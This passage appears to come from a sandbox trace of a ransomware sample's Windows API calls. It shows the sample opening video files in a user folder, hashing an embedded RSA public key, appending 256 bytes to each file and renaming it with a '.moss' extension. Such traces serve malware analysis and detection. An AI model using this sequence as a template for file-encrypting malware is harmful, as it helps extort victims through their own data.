lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.627] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x78be, lpOverlapped=0x0) returned 1 [0172.627] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.627] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ee98) returned 1 [0172.628] CryptCreateHash (in: hProv=0xd2ee98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.628] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.628] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.628] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.628] GetLastError () returned 0x0 [0172.628] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.628] CryptReleaseContext (hProv=0xd2ee98, dwFlags=0x0) returned 1 [0172.628] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.628] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.628] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.629] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.629] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.629] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.629] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x78be, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.629] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.630] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0172.630] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\se6dcbCoGQ56.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\o3ucsfjw\\se6dcbcogq56.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\se6dcbCoGQ56.flv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\o3ucsfjw\\se6dcbcogq56.flv.moss")) returned 1 [0172.630] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.630] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.630] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.632] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0172.632] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ceede20, ftCreationTime.dwHighDateTime=0x1d5d95a, ftLastAccessTime.dwLowDateTime=0x7f95fa80, ftLastAccessTime.dwHighDateTime=0x1d5d801, ftLastWriteTime.dwLowDateTime=0x7f95fa80, ftLastWriteTime.dwHighDateTime=0x1d5d801, nFileSizeHigh=0x0, nFileSizeLow=0x6c58, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="un-_xvo.flv", cAlternateFileName="")) returned 1 [0172.632] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\un-_xvo.flv") returned=".flv" [0172.632] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\un-_xvo.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\o3ucsfjw\\un-_xvo.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.632] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=27736) returned 1 [0172.632] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.636] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x6c32, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.636] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.637] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x6c58, lpOverlapped=0x0) returned 1 [0172.638] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.638] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ee98) returned 1 [0172.639] CryptCreateHash (in: hProv=0xd2ee98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.639] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.639] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.639] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.639] GetLastError () returned 0x0 [0172.639] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.639] CryptReleaseContext (hProv=0xd2ee98, dwFlags=0x0) returned 1 [0172.639] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.639] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.639] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.639] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.639] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.640] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.640] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x6c58, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.640] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.640] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0172.640] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\un-_xvo.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\o3ucsfjw\\un-_xvo.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\un-_xvo.flv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\o3ucsfjw\\un-_xvo.flv.moss")) returned 1 [0172.641] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.641] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.641] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.643] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0172.643] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5879b1a0, ftCreationTime.dwHighDateTime=0x1d5e5fb, ftLastAccessTime.dwLowDateTime=0xa81364f0, ftLastAccessTime.dwHighDateTime=0x1d5e2bc, ftLastWriteTime.dwLowDateTime=0xa81364f0, ftLastWriteTime.dwHighDateTime=0x1d5e2bc, nFileSizeHigh=0x0, nFileSizeLow=0x724d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="w-1pA.mkv", cAlternateFileName="")) returned 1 [0172.643] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\w-1pA.mkv") returned=".mkv" [0172.643] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\w-1pA.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\o3ucsfjw\\w-1pa.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.643] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=29261) returned 1 [0172.643] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.646] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x7227, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.646] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.647] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x724d, lpOverlapped=0x0) returned 1 [0172.647] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.647] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ee98) returned 1 [0172.648] CryptCreateHash (in: hProv=0xd2ee98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.648] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.648] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.649] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.649] GetLastError () returned 0x0 [0172.649] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.649] CryptReleaseContext (hProv=0xd2ee98, dwFlags=0x0) returned 1 [0172.649] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.649] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.649] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.649] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.649] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.650] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.650] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x724d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.650] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.650] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0172.650] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\w-1pA.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\o3ucsfjw\\w-1pa.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\w-1pA.mkv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\o3ucsfjw\\w-1pa.mkv.moss")) returned 1 [0172.651] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.651] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.651] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.657] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0172.657] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5879b1a0, ftCreationTime.dwHighDateTime=0x1d5e5fb, ftLastAccessTime.dwLowDateTime=0xa81364f0, ftLastAccessTime.dwHighDateTime=0x1d5e2bc, ftLastWriteTime.dwLowDateTime=0xa81364f0, ftLastWriteTime.dwHighDateTime=0x1d5e2bc, nFileSizeHigh=0x0, nFileSizeLow=0x724d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="w-1pA.mkv", cAlternateFileName="")) returned 0 [0172.657] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.657] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0172.657] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0172.657] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.657] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0172.657] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.657] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.657] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.657] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.657] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.657] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.657] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.657] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.657] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.657] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.657] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0172.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.659] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.659] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.659] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.659] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.659] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.659] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.659] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.659] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.659] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.659] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.659] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.659] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.659] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.659] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.660] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.660] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.660] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.660] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.660] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.660] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.660] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.660] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.660] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.660] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.660] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: 